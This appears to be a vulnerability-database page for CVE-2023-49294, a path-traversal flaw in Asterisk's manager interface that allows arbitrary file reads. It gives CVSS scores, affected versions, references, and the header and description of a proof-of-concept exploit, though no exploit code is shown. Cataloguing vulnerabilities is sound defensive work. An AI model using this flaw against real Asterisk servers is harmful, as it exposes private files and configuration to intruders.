            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-22",
                "lang": "eng",
                "value": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
            "refsource": "MISC",
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
            "refsource": "MISC",
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
            "refsource": "MISC",
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "name": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html",
            "refsource": "MISC",
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-8857-hfmw-vg8f",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
                    "versionEndExcluding": "18.20.1",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
                    "versionEndExcluding": "20.5.1",
                    "versionStartIncluding": "19.0.0",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
                    "matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
                    "matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
                    "matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
                    "matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
                    "matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
                    "matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
                    "matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
                    "matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
                    "matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
                    "matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
                    "matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
                    "matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
                    "matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
                    "matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
                    "matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
                    "matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
                    "matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
                    "matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
                    "matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
                    "matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
                    "matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
                    "matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
                    "matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
                    "matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
                    "matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
                    "matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
                    "matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
                    "matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
                    "matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ]
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
          },
          {
            "lang": "es",
            "value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema."
          }
        ],
        "id": "CVE-2023-49294",
        "lastModified": "2023-12-29T00:15:49.930",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "nvd@nist.gov",
              "type": "Primary"
            },
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "exploitabilityScore": 1.2,
              "impactScore": 3.6,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2023-12-14T20:15:52.730",
        "references": [
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Product"
            ],
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Patch"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Vendor Advisory"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-22"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Primary"
          }
        ]
      }
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2023-49294

Vulnerability from cvelistv5

var-202312-2340

Vulnerability from variot

Date: 2023-03-26

Exploit Author: Sean Pesce

Vendor Homepage: https://asterisk.org/

Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/

Version: 18.20.0

Tested on: Debian Linux

CVE: CVE-2023-49294

!/usr/bin/env python3

Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that

facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of

file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar

to the common INI configuration format.

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-49294

https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f

https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

wid-sec-w-2023-3158

Vulnerability from csaf_certbund

gsd-2023-49294

Vulnerability from gsd

Tags

Sightings

Nomenclature